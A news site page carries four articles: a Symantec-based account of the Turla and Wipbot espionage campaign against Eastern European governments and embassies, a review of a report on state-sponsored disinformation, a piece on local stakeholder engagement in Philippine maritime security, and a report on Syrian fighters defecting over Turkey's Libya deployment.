Connect with us

Intelligence

Turla: Spying tool targets governments and diplomats

MD Staff

Published

on

A cyberespionage campaign involving malware known as Wipbot and Turla has systematically targeted the governments and embassies of a number of former Eastern Bloc countries. Trojan.Wipbot (known by other vendors as Tavdig) is a back door used to facilitate reconnaissance operations before the attackers shift to long term monitoring operations using Trojan.

Turla (which is known by other vendors as Uroboros, Snake, and Carbon). It appears that this combination of malware has been used for classic espionage-type operations for at least four years. Because of the targets chosen and the advanced nature of the malware used, Symantec believes that a state-sponsored group was behind these attacks.

Turla provides the attacker with powerful spying capabilities. Configured to start every time a computer starts, once the user opens a Web browser it opens a back door that enables communication with the attackers. Through this back door, the attackers can copy files from the infected computer, connect to servers, delete files, and load and execute other forms of malware, among other capabilities.

The group behind Turla has a two-pronged attack strategy that involves infecting victims through spear phishing emails and watering hole attacks. The watering hole attacks display competent compromise capabilities, with the attackers compromising a range of legitimate websites and only delivering malware to victims visiting from pre-selected IP address ranges. These compromised websites deliver a payload of Trojan.Wipbot. It is highly likely that Wipbot is then used as a downloader to deliver Turla to the victim.

Victims
While infections initially appeared to be spread over a range of European countries, closer analysis revealed that many infections in Western Europe occurred on computers that were connected to private government networks of former Eastern Bloc countries. These infections appear to have transpired in the embassies of these countries.  

Analysis of infections revealed that the attackers were heavily focused on a small number of countries. For example, in May of 2012, the office of the prime minister of a former Soviet Union member country was infected. This infection spread rapidly and up to 60 computers at the prime minister’s office were compromised.

Another attack saw a computer at the embassy to France of a second former Soviet Union member infected in late 2012. During 2013, infections began to spread to other computers linked to the network of this country’s ministry of foreign affairs. In addition, its ministry of internal affairs was also infected.  Further investigation uncovered a systematic spying campaign targeted at its diplomatic service. Infections were discovered at embassies in Belgium, Ukraine, China, Jordan, Greece, Kazakhstan, Armenia, Poland, and Germany.

At least five other countries in the region were targeted by similar attacks. While the attackers have largely focused on the former Eastern Bloc, a number of other targets were also found. These included the ministry for health of a Western European country, the ministry for education of a Central American country, a state electrical authority in the Middle East, and a medical organization in the US.

Prior to publication, Symantec notified all relevant national authorities, such as Computer Emergency Response Centers (CERTs) that handle and respond to Internet security incidents.

Attack vectors
The group behind Turla uses spear phishing emails and watering hole attacks to infect victims. Some of the spear phishing emails purported to come from a military attaché at a Middle Eastern embassy and had an attachment masquerading as the minutes of meetings. Opening the attachment resulted in Trojan.Wipbot being dropped on to the victim’s computer. It is believed that Wipbot may be the delivery mechanism for Turla as they share several similarities in code and structure.

Since September 2012, the group has compromised at least 84 legitimate websites to facilitate watering hole attacks. Websites owned by a number of different governments and international agencies were among those compromised by the attackers.

Visitors to these sites were being redirected to Web servers where a ‘fingerprinting’ script was executed. This script collected some identifying information about the visitor’s computer. This phase of the campaign appeared to serve as an intelligence trawl, gathering information about what browsers and plugins website visitors were using, which would help identify which exploits would work best against them.

The next phase of the operation was highly targeted, with servers then configured to drop Wipbot only to IP addresses associated with intended targets. In one instance, the malware delivered was disguised as a Shockwave installer bundle. Wipbot was then used to gather further information about the infected computer. If the attackers deemed the victim of interest, it appears likely that a second back door (Trojan.Turla) with far greater capabilities was downloaded on to the victim’s computer.

Wipbot appears to act as a reconnaissance tool, while Turla is used to maintain a long term presence on the victim’s computer. Analysis conducted by Symantec has found several technical connections between Wipbot and Turla which indicates the same group or larger organization wrote both pieces of code.

Turla
Symantec has been tracking the activities of the group behind Turla for a number of years. The identity of the attackers has yet to be established, although timestamps from activity associated with the attacks indicate that most activity occurs during the standard working day of the UTC +4 time zone.

Turla is an evolution of an older piece of malware, Trojan.Minit, which has been in operation since 2004. The current campaign is the work of a well-resourced and technically competent attack group that is capable of penetrating many network defenses. It is focused on targets that would be of interest to a nation state, with spying and theft of sensitive data among its objectives.

Symantec protection
Symantec has the following detection in place for the malware used in these attacks:

AV

    Trojan.Turla
    Trojan.Wipbot

IPS

    System Infected: Trojan.Turla Activity
    System Infected: Trojan.Turla Activity 2

Continue Reading
Comments

Intelligence

Conspiracy Theories, Fake News and Disinformation: Why There’s So Much of It and What We Can Do About it

Published

on

In March 2019, under the aegis of the United States Department of State, a group of researchers released a report called “Weapons of Mass Distraction: Foreign State-Sponsored Disinformation in the Digital Age.” The report mostly focused on foreign states’ propaganda, disinformation and fake news. Taking into account the upcoming US elections, the report can provide practical recommendations for policymakers and stakeholders.

The report begins with a horrific story broadcasted on the Russian state-owned “Channel One” in 2014. The story covered how Ukrainian soldiers crucified a child in front of its mother’s eyes. Later, this story was proved to be fake, and there was neither a killed child, nor shocked mother. Still, the story went viral. It had reached a much broader audience on social mediathan it did on television.

The authors refer to that story as “an example of Kremlin-backed disinformation campaign.” The authors of the report continued to state that “in subsequent years, similar tactics would again be unleashed by the Kremlin on other foreign adversaries, including the United States during the lead-up to the 2016 presidential election.”

Undoubtedly, the fake story did a lot of damage to the reputation of Channel One and other state-funded media. It is clear why authors begin with that story — it was poorly done, obviously faked and quickly exposed. However, it showed how effective and powerful social media could be (despite all of the reputation risks). There is also an important point highlighted in the report, particularly that “the use of modern-day disinformation does not start and end with Russia. A growing number of states, in the pursuit of geopolitical ends, are leveraging digital tools and social media networks to spread narratives, distortions, and falsehoods to shape public perceptions and undermine trust in the truth.” We are used to research, dedicated to propaganda and fake news issues, that establishes only Russia is responsible for disinformation and fake news. This report, on the other hand, addresses propaganda and disinformation as a comprehensive problem.

In the introduction, the authors claim that disinformation is a problem that consists of two major factors: technology giants and their impact and the psychological element of how people consume information on the Internet. Technology giants have disrupted disinformation and propaganda, and the proliferation of social media platforms made the information ecosystem vulnerable to foreign, state-sponsored actors. “The intent [of bad foreign actors] is to manipulate popular opinion to sway policy or inhibit action by creating division and blurring the truth among the target population.”

Another important aspect of disinformation highlighted in the report is the abuse of fundamental human biases and behaviour. The report states that “people are not rational consumers of information. They seek swift, reassuring answers and messages that give them a sense of identity and belonging.” The statement is proved by the research showing that, on average, a false story reaches 1 500 people six times more quickly than a factual account. And indeed, conspiracy stories have become something usual these days. We see it has become even more widespread during the current pandemic — 5G towers, Bill Gates and “evil Chinese scientists” who supposedly invented the coronavirus became scapegoats. And there are a lot more paranoid conspiracy stories spreading on the Internet.

What is the solution? Authors do not blame any country, tech giants or the behavior of people. Rather the opposite, they suggest that the solution should be complex: “the problem of disinformation is therefore not one that can be solved through any single solution, whether psychological or technological. An effective response to this challenge requires understanding the converging factors of technology, media, and human behaviours.”

Define the Problem First

What is the difference between fake news and disinformation? How does disinformation differ from misinformation? It is a rather rare occasion that reports give a whole chapter dedicated to terminology. And the report “The Weapons of Mass Distraction” definitely provides readers with a vast theoretical background. Authors admit that there are a lot of definitions, and it is difficult to ascribe the exact parameters to disinformation. However, it states that “misinformation is generally understood as the inadvertent sharing of false information that is not intended to cause harm, just as disinformation is widely defined as the purposeful dissemination of false information.”

Psychological Factors

As it was mentioned in the beginning, authors do not attach labels and do not focus on one side of the problem. A considerable part of the report is dedicated to psychological factors of disinformation. The section helps readers understand behavioural patterns of how humans consume information, why it is easy to fall for a conspiracy theory, and how to use this information to prevent the spread of disinformation.

The findings are surprising. There are several cognitive biases that make disinformation easy to flourish. And the bad news is that there is little we can do about it.

First of all, confirmation bias and selective exposure lead people to prefer information that confirms their preexisting beliefs make information consistent with one’s preexisting beliefs more persuasive. Moreover, confirmation bias and selective exposure work together with other naïve realism that “leads individuals to believe that their perception of reality is the only accurate view and that those who disagree are simply uninformed or irrational.”

In reality, these cognitive biases are widely used by tech giants. That doesn’t mean that there is a conspiracy theory behind it. That means that it is easy for big tech companies to sell their products using so-called “filter bubbles.” Such a bubble is an algorithm that selectively guesses what information a user would like to see based on information about the user, such as location, past click-behaviour and search history. Filter bubbles work well on such websites like YouTube. A Wall Street Journal investigation found that YouTube’s recommendations often lead users to channels that feature conspiracy theories, partisan viewpoints and misleading videos, even when those users haven’t shown interest in such content.

These days, the most popular way to counter misinformation is fact-checking and debunking the false information. In the report, the researchers presented some evidence that the methods we are used to employing, may not be that effective. “Their analysis determined that users are more active in sharing unverified rumours than they are in later sharing that these rumours were either debunked or verified. The veracity of information, therefore, appears to matter little. A related study found that even after individuals were informed that a story had been misrepresented, more than a third still shared the story.”

The other research finding is that “participants who perceived the media and the word “news” negatively were less likely than others to identify a fake headline and less able to distinguish news from opinion or advertising.” Obviously, there is a reason for that. It’s a lack of trust. The public has low trust towards journalists as a source of information about the coronavirus, says the latest research. Additionally, according to the American Press Institute, only 43 per cent of people said they could easily distinguish factual news from opinion in online-only news or social media. Thus, the majority of people can hardly distinguish news from opinions in a time when trust towards journalism is at its historical minimum. It is therefore no surprise that people perceive news that negatively.

This can have implications for news validation. The report states it can differ from country to country. “Tagging social media posts as “verified” may work well in environments where trust in news media is relatively high (such as Spain or Germany), but this approach may be counterproductive in countries where trust in news media is much lower (like Greece).

A vast research basis also reveals the following essential findings. First, increasing online communities’ exposure to different viewpoints is rather counterproductive. The research presented in the report found that conservative people become more conservative and liberals become more liberal.

Second, the phenomenon called belief perseverance, which is the inability of people to change their minds even after being shown new information, means that facts can matter little in the face of strong social and emotional dynamics.

Third, developing critical thinking skills and increasing media literacy may also be counterproductive or have minimal use. Research shows us that “many consumers of disinformation already perceive themselves as critical thinkers who are challenging the status quo.” Moreover, even debunking false messages cannot be that effective. Showing corrective information did not always reduce the participant’s belief in misinformation. Besides, “consumers of fake news were presented with a fact-check, they almost never read it.”

What can be done here? Authors provide the reader with a roadmap for countering misleading information. Although the roadmap, which is also based on researches, can have very limited use, according to the report.

The main idea is to be proactive. While debunking false messages, developing critical thinking, and other tools have minimal potential, some psychological interventions can help in building resilience against disinformation. Authors compare disinformation and misinformation as a disease, and they propose we need a vaccine that builds resilience to a virus. This strategy means that people should be warned “that they may be exposed to information that challenges their beliefs, before presenting a weakened example of the (mis)information and refuting it.”

Another aspect of the roadmap is showing different perspectives, “which allows people to understand and overcome the cognitive biases that may render them adversarial toward opposing ideas.” According to the authors, this approach should focus less on the content of one’s thoughts and more on their structure. The fact that certain factors can make humans susceptible to disinformation can also be used as part of the solution.

What About the Tech Giants?

The authors admit that social media platforms should be playing a central role to neutralize online disinformation. Despite the fact that tech giants demonstrated their willingness to address disinformation, their incentives are not always prioritized to limit disinformation. Moreover, their incentives are aligned with spreading more of it because of its business model. “Users are more likely to click on or share sensational and inaccurate content; increasing clicks and shares translates into greater advertising revenue. The short-term incentives, therefore, are for the platforms to increase, rather than decrease, the amount of disinformation their users see.”

The technological section of the report is split into three parts dedicated to three tech companies — Facebook, Twitter and Google. While the report focuses on what companies have already done to counter disinformation, we will highlight only the recommendations and challenges that still remain.

Despite all the incentives that have been implemented by Facebook in recent years, the social media platform still remains vulnerable for disinformation. The main vulnerability is behind its messaging apps. WhatsApp has been a great source of disinformation during the Rohingya crisis in 2018 and during the Brazilian presidential elections in the same year. The second vulnerability lies in third-party fact-checking services staffed by human operators. Human operators are struggling to handle the volume of the content: “fake news can easily go viral in the time between its creation and when fact-checkers are able to manually dispute the content and adjust its news feed ranking.”

Despite all the vulnerabilities, including a colossal bot network, Twitter became more influential in countering the threat using such technologies like AI. The question of how proactive the company will be countering the threat still remains. Yet, Twitter now uses best practices, according to the report.

With its video-sharing platform YouTube and ad platform, YouTube might be the most vulnerable platform. The website, with its personalized recommendation algorithm (filter bubbles), has faced strong criticism for reinforcing the viewers’ belief that the conspiracy is, in fact, real. However, YouTube announced in 2019 that it would adjust its algorithms to reduce recommendations of misleading content.

However, it is not just the tech giants who should take responsibility for disinformation. According to the report, it’s countries who should bear the ultimate responsibility for “defending their nations against this kind of disinformation.” Yet, since the situation is still in private hands, what can the government do here?

For example, they could play a more significant role in engaging in regulating social media companies. According to the report, it doesn’t mean total control of social media companies. However, authors admit that this solution may have some implications for possible restriction of freedom of speech and outright censorship, and there is no easy and straightforward way to solve this complex problem.

What can we do about it? According to the report, technology will change, but the problem will not be solved within the next decade. And the fact is, we should learn how to live with the disinformation. At the same time, public policies should focus on mitigating disastrous consequences while maintaining civil liberties, freedom of expression and privacy.

The report provides readers with quite a balanced approach to the problem. While other research projects attach labels on countries or technologies, the authors of the report “Weapons of Mass Distraction” admit the solution will not be easy. It is a complex problem that will require a complex solution.

From our partner RIAC

Continue Reading

Intelligence

Engaging with Local Stakeholders to Improve Maritime Security and Governance

Michael Van Ginkel

Published

on

Illicit activity in the maritime domain takes place within a complex cultural, physical, and political environment. When dialogue is initiated with a diverse range of stakeholders, policy recommendations can take into account region-specific limitations and opportunities. As noted in the Stable Seas: Sulu and Celebes Seas maritime security report, sectors like fisheries, coastal welfare, and maritime security are intrinsically linked, making engagement with a diverse range of local stakeholders a necessity. This collaborative approach is essential to devising efficient and sustainable solutions to maritime challenges. Engagement with local stakeholders helps policymakers discover where in these self-reinforcing cycles additional legislation or enforcement would have the greatest positive impact. Political restrictions against pursuing foreign fishing trawlers in Bangladesh, for example, have allowed the trawlers to target recovering populations of hilsa while local artisanal fishers suffer. In the context of the Philippines, the Stable Seas program and the Asia Pacific Pathways to Progress Foundation recently conducted a workshop that highlighted the importance of consistent stakeholder engagement, resulting in a policy brief entitled A Pathway to Policy Change: Improving Philippine Fisheries, Blue Economy, and Maritime Law Enforcement in the Sulu and Celebes Seas.

Physical Environment

Consistent communication with local stakeholders on regional anomalies allows policymakers to modify initiatives to adjust for the physical, cultural, and political context of a maritime issue. The physical environment affects how, where, and why illicit actors operate in the maritime domain. Knowledge held by local stakeholders about uninhabited coastlines, local currents, and the locations of important coastal communities helps policymakers find recognizable patterns in the locations and frequency of maritime incidents. The 36,289 km of coastline in the Philippine archipelago means that almost 60 percent of the country’s municipalities and cities border the sea. The extensive coastline and high levels of maritime traffic make monitoring coastal waters and achieving maritime domain awareness difficult for maritime law enforcement agencies. A Pathway to Policy Change outlines several recommendations by regional experts on ways to improve maritime domain awareness despite limitations imposed by a complex physical environment. The experts deemed collaboration with local government and land-based authorities an important part of addressing the problem. By engaging with stakeholders working in close proximity to maritime areas, policymakers can take into account their detailed knowledge of local environmental factors when determining the method and motive behind illicit activity.

Cultural Environment

Culture shapes how governments respond to non-traditional maritime threats. Competition and rivalry between maritime law enforcement agencies can occur within government structures. A clearer understanding of cultural pressures exerted on community members can help policymakers develop the correct response. Strong ties have been identified between ethnic groups and insurgency recruiting grounds in Mindanao. The Tausug, for instance, tend to fight for the MNLF while the MILF mostly recruits from the Maguindanaons and the Maranao. Without guidance from local stakeholders familiar with cultural norms, correlations could be left unnoticed or the motivations for joining insurgency movements could be misconstrued as being based solely on extremist or separatist ideology. Local stakeholders can offer alternative explanations for behavioral patterns that policymakers need to make accommodations for.

Political Environment

Local stakeholder engagement allows policymakers to work on initiatives that can accommodate limitations imposed by the political environment. Collaboration with local stakeholders can provide information on what government resources, in terms of manpower, capital, and equipment, are available for use. Stakeholders also provide important insights into complex political frameworks that can make straightforward policy implementation difficult. Understanding where resource competition and overlapping jurisdiction exist enables policymakers to formulate more effective initiatives. Despite strong legislation regulating IUU fishing in the Philippines, local stakeholders have pointed out that overlapping jurisdictions have created exploitable gaps in law enforcement. In A Pathway to Policy Change, local experts suggested that the government should lay down an executive order to unify mandates in the fisheries sector to address the issue. Similarly, the Bangsamoro Autonomous Region of Muslim Mindanao (BARMM) is highlighted as a region that heavily influences maritime security in the Sulu and Celebes seas. Working with government officials to understand how policy initiatives need to adjust for the region’s semi-autonomous status ensures maritime issues are properly addressed. BARMM, for instance, issues fishing permits for its own waters in addition to government permits, which can cause inconsistencies. Working alongside local stakeholders allows policymakers to create initiatives that take into account special circumstances within the political system.

Private Sector Engagement

Extending engagement with local stakeholders to the private sector is particularly important during both the policy research and implementation processes. Encouraging private stakeholders to actively help counter illicit activity can help policymakers create a more sustainable and efficient solution to security threats. As A Pathway to Policy Change highlights, private companies already have a strong incentive from a business perspective to involve themselves in environmental and social issues. Governments can encourage further involvement of private stakeholders like blue economy businesses and fishers by offering tax breaks and financial compensation for using sustainable business practices and for helping law enforcement agencies gather information on illicit activity. Offering financial rewards to members of the Bantay Dagat program in the Philippines, for example, would encourage more fishers to participate. Governments can also double down on educational programs to raise awareness of important issues threatening local economic stability. By communicating consistently with local stakeholders, policymakers can both more accurately identify maritime security needs and more comprehensively address them.

Conclusion

The unique physical, cultural, and political context in which maritime issues take place makes the knowledge of local stakeholders an invaluable asset. While many important types of information can be collected without working closely with stakeholders, there are also innumerable important aspects of any given context which cannot be quantified and analyzed from afar. Engagement with stakeholders provides a nuanced understanding of more localized and ephemerial factors that affect regional maritime security. Engaging with local stakeholders allows policymakers to capitalize on opportunities and circumvent limitations created by the political, cultural, and physical environment surrounding maritime issues in order to create sustainable, long-term solutions.

Continue Reading

Intelligence

Turkey Faced With Revolt Among Its Syrian Proxies Over Libyan Incursion

Published

on

Relations between Turkey and Syrian armed groups that used to be considered cordial due to massive support provided by the Turkish authorities to the Syrian opposition are rapidly deteriorating over Turkey’s incursion into the Libyan conflict, according to sources among the Syrian militants fighting in Libya.

Last month, over 2,000 fighters defected from Sultan Murad Division, one of the key armed factions serving the Turkish interests in Syria. The group’s members chose to quit after they were ordered to go to Libya to fight on the side of the Turkey-backed Government of National Accord (GNA). This marks a drastic shift in the attitude of the Syrian fighters towards participation in the Libyan conflict: just a few months ago there was no shortage of mercenaries willing to fly to Libya via Turkey for a lucrative compensation of $2,000 – 5,000 and a promise of Turkish citizenship offered by Ankara.

Both promises turned out to be an exaggeration, if not a complete lie. The militants who traveled to Libya got neither the money nor the citizenship and other perks that were promised to them, revealed a fighter of Ahrar al-Sharqiya faction Zein Ahmad. Moreover, he pointed out that after the fighters arrived in Libya they were immediately dispatched to Tripoli, an arena of regular clashes between GNA forces and units of the Libyan National Army despite Turkish promises of tasking them with maintaining security at oil facilities.

Data gathered by the Syrian Observatory for Human Rights shows that around 9,000 members of Turkey-backed Syrian armed factions are currently fighting in Libya, while another 3,500 men are undergoing training in Syria and Turkey preparing for departure. Among them are former members of terror groups such as Al-Qaeda affiliate in Syria Hayat Tahrir al-Sham, as confirmed by reports of capture of a 23-years-old HTS fighter Ibrahim Muhammad Darwish by the LNA forces. Another example is an ISIS terrorist also captured by the LNA who confessed that he was flown in from Syria via Turkey.

By sending the Syrian fighters to Libya Ankara intended to recycle and repurpose these groups for establishing its influence without the risks and consequences of a large-scale military operation involving major expenses and casualties among Turkish military personnel. However, the recent developments on the ground show that this goal was not fully achieved.

The Syrian fighters sustain heavy casualties due to the lack of training and weaponry. Total count of losses among the Turkey-backed groups reached hundreds and continue to grow as GNA and LNA clash with intermittent success. Until Turkey’s President Recep Erdogan curbs his ambition, destructive nature of involvement of the Syrian armed groups in Libya may result in the downfall of Turkey’s influence over the Syrian opposition.

Continue Reading

Publications

Latest

Trending